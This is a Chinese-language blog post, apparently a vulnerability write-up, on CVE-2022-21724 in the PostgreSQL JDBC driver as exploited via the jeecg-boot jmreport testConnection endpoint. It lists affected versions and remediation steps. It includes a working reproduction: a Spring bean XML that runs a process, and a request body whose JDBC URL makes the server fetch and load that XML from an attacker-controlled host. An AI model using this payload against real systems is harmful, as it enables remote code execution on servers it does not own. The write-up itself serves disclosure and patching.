jeecg-boot/jmreport 积木报表基于SSTI的任意代码执行漏洞、PostgresQL JDBC Drive 任意代码执行漏洞(CVE-2022-21724)

PostgresQL JDBC Drive 任意代码执行漏洞(CVE-2022-21724)

JDBC Java 数据库连接,(Java Database Connectivity)是 Java 语言中用来规范客户端如何访问数据库的应用程序接口,具体讲就是通过 Java 连接广泛数据库,并对表中数据执行增、删、改、查等操作的技术。

当程序中 JDBC 连接 URL 可控时,可能会造成安全问题。比较具有代表性的就是 JDBC 反序列化漏洞,是在于 mysql 数据库连接时产生的。

漏洞简介

在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。 pgjdbc 根据通过 authenticationPluginClassName、sslhostnameverifier、socketFactory 、sslfactory、sslpasswordcallback 连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。

影响范围:

9.4.1208 <=PgJDBC <42.2.25

42.3.0 <=PgJDBC < 42.3.2

漏洞重现

xml文件
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
   <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg value="calc" />
        <property name="whatever" value="#{ pb.start() }"/>
    </bean>
</beans>
参数
{"dbDriver":"org.postgresql.Driver",
"dbUrl":"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=https://yourIp:3000/bean.xml",
"dbName": "mysql",
"dbUsername":"1",
"dbPassword":"1"}

请求路径

192.168.88.2:9999/jeecg-boot/jmreport/testConnection

在这里插入图片描述

解决方案

1.升级 postgresql
<postgresql.version>42.3.2</postgresql.version>
2.ShiroConfig 权限控制 关闭
filterChainDefinitionMap.put(“/jmreport/**”, “anon”)

  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值